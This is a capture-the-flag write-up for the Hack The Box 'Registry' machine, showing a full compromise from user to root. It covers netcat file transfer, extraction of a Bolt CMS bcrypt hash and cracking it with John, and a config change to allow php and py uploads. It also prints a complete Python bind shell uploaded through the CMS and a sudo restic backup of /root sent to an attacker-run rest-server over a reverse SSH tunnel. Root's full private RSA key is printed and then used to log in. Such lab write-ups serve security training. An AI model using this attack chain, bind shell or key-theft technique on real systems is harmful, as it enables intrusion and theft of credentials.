debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Offering public key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
debug1: Server accepts key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
Enter passphrase for key 'id_rsa': 
debug1: Authentication succeeded (publickey).
Authenticated to registry.htb ([10.10.10.159]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sat Apr  4 01:14:31 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 39%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    163
Last login: Sat Apr  4 00:57:04 2020 from 10.10.15.8
bolt@bolt:~$ whoami & hostname
[1] 6324
bolt
bolt
bolt@bolt:~$

and Finally i can now get the user.txt

# bash

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sat Apr  4 01:14:31 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 39%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address for docker0:         172.17.0.1
  Processes:    163
Last login: Sat Apr  4 00:57:04 2020 from 10.10.15.8
bolt@bolt:~$ whoami & hostname
[1] 6324
bolt
bolt
bolt@bolt:~$ ls
user.txt
[1]+  Done                    whoami
bolt@bolt:~$ cat user.txt
ytc0y[-----------------------]3ywzi
bolt@bolt:~$

---

Exploitation

So it’s time to do enumeration again the bolt user shell, I tried LinPEAS to enumerate the shell, then I found out that there was a CMS installed in the machine which is "Bolt CMS"

wget, curl was not working, so I try netcat to transfer the linpeash.sh

# bash

# on my registry machine (the receiver)
bolt@bolt:/tmp$ nc -l -p 1234 > linpeas.sh

# and on my kali linux machine (the sender)
root in boxes/Registry/docker
❯ nc -w 3 10.10.10.159 1234 < linpeas.sh


# run linpeas on registry
bolt@bolt:/tmp$ chmod +x linpeas.sh
bolt@bolt:/tmp$ bash linpeas.sh

Registry Basic Information

# bash

====================================( Basic information )=====================================
OS: Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019
User & Groups: uid=1001(bolt) gid=1001(bolt) groups=1001(bolt)
Hostname: bolt
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
[+] nmap is available for network discover & port scanning, you should use it yourself

BOLT CMS WEBSITE

Going deep of recon I see db.sqlite which contains a password hash, and installed CMS Website at /var/www/html directory.

# bash

[+] Looking for tables inside readable .db/.sqlite files (limit 100)
 -> Extracting tables from /var/www/html/bolt/vendor/codeception/codeception/tests/data/sqlite.db (limit 20)                                                                               
 -> Extracting tables from /var/www/html/bolt/tests/phpunit/unit/resources/db/bolt.db (limit 20)                                                                                           
  --> Found for interesting column names in bolt_authtoken (output limit 10)                                                                                                               
CREATE TABLE bolt_authtoken (id INTEGER NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL, PRIMARY KEY(id))
  --> Found for interesting column names in bolt_users (output limit 10)
CREATE TABLE bolt_users (id INTEGER NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
, enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
, PRIMARY KEY(id))

 -> Extracting tables from /var/www/html/bolt/app/database/bolt.db (limit 20)
  --> Found for interesting column names in bolt_authtoken (output limit 10)                                                                                                               
CREATE TABLE bolt_authtoken (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL)
9, 1, None, 2e3f688aab59a4586f54fbd3f284eb3b941b0580142356d840c7e582801b6388, 33aa58459b97be252a29fd98e3cdf81b, 2020-04-04 18:48:37, 10.10.15.104, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0, 2020-04-18 18:48:37
  --> Found for interesting column names in bolt_users (output limit 10)
CREATE TABLE bolt_users (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
, enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
)
1, admin, $2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK, bolt@registry.htb, 2020-04-04 22:00:22, 10.10.15.139, Admin, ["files://lass.php"], 1, None, None, None, 0, None, ["root","everyone"]


[+] Web files?(output limit)
/var/www/:                                                                                                                                                                                 
total 16K
drwxr-xr-x  4 root     root     4.0K May 26  2019 .
drwxr-xr-x 14 root     root     4.0K May 19  2019 ..
drwx------  3 root     root     4.0K May 26  2019 .cache
drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 html

/var/www/html:
total 32K
drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 .

I visited the bolt website at registry.htb/bolt

Then I decrypt the password hasha using John The Ripper so:

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 
❯ john bolt-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (admin)
1g 0:00:00:05 DONE (2020-04-05 06:54) 0.1996g/s 71.85p/s 71.85c/s 71.85C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root in htb/boxes/Registry via 🐘 v7.3.15 took 9s 
❯

after only 9 seconds i get the password strawberry and login this into Bolt CMS

BOLT CMS LOGIN PAGE

After login it display the dashboard which has a lot of stuffs.

BOLT CMS DASHBOARD PAGE

I search on the bolt cms exploit and I found this article it is the same version on the bolt cms installed on the registry machine.

I tried to follow the exploitation but it doesn’t work. Also this part was really hard because theres a cron job inside that will erase everything you modified to I need to be fast as much.

So this is the default Config.yml in Bolt CMS Configuration where you can edit accept_file_types.

In the configuration file i’ll put php, and py extensions so I can upload my webshells. Why I need to upload 2 different file ? PHP Reverse Shell is not working so I search for other webshell that I can execute and get remote inside on the webserver.

Until i found out that I can use Bind Shell go gain remote shell. So I created my simple bind shell with python. this is similar to this one

# python

#!/usr/bin/python3

# Usage: nc -v <ipaddress> 9001 in the attacker machine to connect to the shell

import os
import pty
import socket

PORT = 9001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(1)
(rem, addr) = s.accept()
os.dup2(rem.fileno(),0)
os.dup2(rem.fileno(),1)
os.dup2(rem.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

save it ! then I used p0wnyShell so I can run the bind shell (shell.py) and connect it with my Kali Linux so. after done setting up I’ uploaded it into File Management inside the Bolt CMS.

now I will open the p0wnyshell and run the shell.py

You will see that the port is in already in use but it’s okay I can still connect with my Kali Linux, and Now I’m on the shell of www-data

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ nc -v 10.10.10.159 9001
registry.htb [10.10.10.159] 9001 (?) open
www-data@bolt:~/html/bolt/files$ ls
ls
www-data@bolt:~/html/bolt/files$ whoami
whoami
www-data

---

Privilege Escalation

As a www-data user we can restic sudo

# bash

www-data@bolt:~/html/bolt/files$ sudo -l
sudo -l
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*
www-data@bolt:~/html/bolt/files$ 

So as we have privilege for running the restic we can get the root.

RESTIC BACKUP PROGRAM

So what is Restic ?
Restic is a backup program that is fast, efficient and secure. It supports the three major operating systems (Linux, macOS, Windows) and a few smaller ones (FreeBSD, OpenBSD).

Since we have privilege by running restic we can backup the root directory and get the administrator shell.

First I install restic into may Kali Linux.

# bash

sudo apt-get install restic

after the installation, I will create backup folder and set a password on that.

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4m1s 
❯ mkdir backups

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ restic init -r ./backups/
enter password for new repository: 
enter password again: 
created restic repository 6f893c5da1 at ./backups/

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s 
❯

Looking at the backups directories

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s 
❯ ls backups/
config  data  index  keys  locks  snapshots

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ 

SETTING UP THE SERVER

Now I will install docker to my machine and start a server at port 8000

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ sudo apt install docker.io

Now i will run restic server on my machine and set the path at /backups so:

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ docker run -p 8000:8000 -v /root/htb/boxes/Registry/backups/:/backups -it restic/rest-server sh
/ # rest-server --path /backups
rest-server 0.9.7 compiled with go1.10 on linux/amd64
Data directory: /backups
Authentication disabled
Private repositories disabled
Starting server on :8000

after it’s successfully start the server we will go back the the bolt user shell and set reverse SSH so:

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sun Apr  5 01:51:21 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 37%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   1%                IP address for docker0:         172.17.0.1
  Processes:    164
Last login: Sun Apr  5 01:15:52 2020 from 10.10.15.43
bolt@bolt:~$

CREATING BACKUPS

Looks good ! Now I can create backups in www-data, I will choose to backup /root/ folder because this what I need to ge the administrator so:

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ nc -v 10.10.10.159 12346
registry.htb [10.10.10.159] 12346 (?) open
www-data@bolt:~/html/bolt/files$ 

www-data@bolt:~/html/bolt/files$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
</restic backup -r rest:http://127.0.0.1:8000/ /root
enter password for repository: -------------

password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:01] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:01
snapshot 4d60990a saved
www-data@bolt:~/html/bolt/files$

Now it’s successfully saved on snapshot, back into my machine I will restore the backup I created.

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ restic -r backups/ restore latest --target restore/
enter password for repository: 
repository 6f893c5d opened successfully, password is correct
created new cache in /root/.cache/restic
restoring <Snapshot 4d60990a of [/root] at 2020-04-05 01:58:02.792216091 +0000 UTC by root@bolt> to restore/

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4s 
❯

Success ! Now it will create /restore folder which contains all the files we need, from there I can get the root.txt

# bash

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 
❯ cd restore

root in boxes/Registry/restore 
❯ ls
root

root in boxes/Registry/restore 
❯ cd root

root in Registry/restore/root 
❯ ls
config.yml  cron.sh  root.txt

root in Registry/restore/root 
❯ cat root.txt
ntrk[---------------------]kztgw

isn’t enough we need the administrator shell, i will use the id_rsa inside the .ssh so:

# bash

root in Registry/restore/root 
❯ ls -la
total 76
drwx------ 7 root root  4096 Oct 21 18:37 .
drwx------ 3 root root  4096 Apr  5 09:59 ..
lrwxrwxrwx 1 root root     9 May 29  2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root  3106 Sep 27  2019 .bashrc
drwx------ 2 root root  4096 Sep 27  2019 .cache
drwxr-xr-x 3 root root  4096 Sep 27  2019 .config
-rw-r--r-- 1 root root 20999 Oct 21 18:04 config.yml
-rw-r--r-- 1 root root   118 Oct 21 18:37 cron.sh
drwx------ 3 root root  4096 Sep 27  2019 .gnupg
drwxr-xr-x 3 root root  4096 Oct  9 04:57 .local
-rw-r--r-- 1 root root   148 Aug 17  2015 .profile
-r-------- 1 root root    33 Sep 27  2019 root.txt
-rw-r--r-- 1 root root    66 Oct 21 18:00 .selected_editor
drwxr-xr-x 2 root root  4096 Oct 17 17:58 .ssh
-rw-r--r-- 1 root root   215 Oct 21 16:59 .wget-hsts

root in Registry/restore/root 
❯ cd .ssh

root in restore/root/.ssh 
❯ ls
authorized_keys  id_rsa  id_rsa.pub

root in restore/root/.ssh 
❯ chmod 600 id_rsa


root in restore/root/.ssh 
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAmiGiXpswTyHhjgC55jHRWlGX1asEMyDFfkVwhuNohv/4cQKm
cJB/3psQocosq+GMh9Y/uRPUgMcDnrTaNYOdkPS+QLd8vcFKSwSewH1w4/AYLuci
4k71qYsJlkcS2Pb0PqEcpodmXf4OBdTCiCCnjgGhOcvPpKMSCb1vy2Yo+A+eHzKp
1S48LgJRLKU1sGe0KE4MC8g7qpF7NSKOCW69z5KaoopQA3jPxnW17WE9PdGZQvqX
4/Mf9DGdeUrejRlX0BI2EGiZhPKwwKxqIHLRpw4pR4+OjR1sOkAA7UWtMYn/3cs+
IS3L75/i5Qsr0cMCtZ/hQAKtjpPoCCe1qHp7CQIDAQABAoIBAFlvYtQaoLGKK2NG
sJgOGDicV8o37bvtLCvVBzJ+Ck0rgnGw4/s1Hb2BpOj8c2dY/T5k55zxEMGYuVUC
BAxBTtCp8yuCTPOekQluqN9w6myZCK9Ol0NSJeI3N1zn6NvUkG0293T55EBuBp0D
k82BhTg1YeQzi00xAmp8bb5MjUFCiCbSFH1MMpY/9itg1b3mqx7UlyDldMM9UdKH
HS9aZmAzY5/U6wEtJi4mx3QIoVahytMgcxd7qoicCYyVm73HFQsZ58L+5QflygH4
dpbptPOnNmLUkWFXcK3bmlmrEyuafS6z68oDFeAZz8Dg2D2qXWfhdlN4GVstlxSI
skH5sAECgYEAySOp7KOZJVpstF8zjn+/OZowEF4iSHnaGAX64B6GgWwXQURn3wVq
tlqDO5m5vIexe2tyFDSVe5otWtzQvbPNkjpD7/kglGTbT9PCU/Dgb5pTmOxBPi9a
1W8+q7lwiXLIRb4NB+BqDz0yI924BnZt9rukzm9650Rrbala0HZxhIECgYEAxCux
RQUzgSx7YdzThvB8sAzQJj2gNAbwEA9Y56I0pQLvTNoGQY8V8IYBrlvW935kLfcf
xz8j5VNt1BizDQjG8j5FfVcU6VE98/OMgn4XKd6nl9sOoQBXzssjUF+3AIhn5DsK
Q/IymTZEmhfGAt9k6dE4WH8qffea/E7qJY+pkokCgYAdatLiYjb2yJfXdYkD0Vk1
YoCfFDVtZizokI9VkgFYEmgASrHqY09tJiXFZMFOeoYRp/BCVkJ6ll0Fyf/Zjt+F
AHKJOWVzbqDItw7X2gXpLKgHWJ5eKuzdBG0lDnUQFTKHSLl9Kmw4mFmp9zZ/83g3
us/qxVEzW8Vef4Nhs8D8gQKBgDtsMMqDhNKAMu+2AK1Dc8GwX+z1he28nEOBIqEn
1WKWvP4+nN6HBVJShXfXggp+UsJJtWqZiboRx5cT1EkCe6Etk8cf9cmnPmkDQXDV
2RZpx8KMLKZAgFi31/6kv759k1rjN3zVhNY8RhOXV/fOy7a4FaVY//ogYuZC0VKH
bgphAoGBAKGyJQe/b6rUkpzvIBxbGt9Hw1kpLr07VCdPQb1MCdCU4l+mlDD5NBN3
mzygp6MTi+TvN3PhxlfAmUPbz0qw+3aX95pt2cQ492wLOe+RsVsKtvDTgH/2+DUe
2qnb+Jd6ERs3jmBeuuavC2O5ajhyLt1xL3uF5UVpoenCYlYuOvL4
-----END RSA PRIVATE KEY-----

root in restore/root/.ssh 
❯

GET THE ADMIN SHELL

# bash

root in restore/root/.ssh 
❯ ssh -i id_rsa root@registry.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Sun Apr  5 02:06:19 UTC 2020

  System load:  0.0               Users logged in:                1
  Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 38%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   1%                IP address for docker0:         172.17.0.1
  Processes:    169
Last login: Mon Oct 21 09:53:48 2019
root@bolt: whoami
root
root@bolt:~# 

---

If you liked my writeup please leave a respect on my Profile

---

Referrences:

Anatomy of a hack: Docker Registry

Docker Registry

Exploiting Docker Registry

p0wnyshell

Bind Shell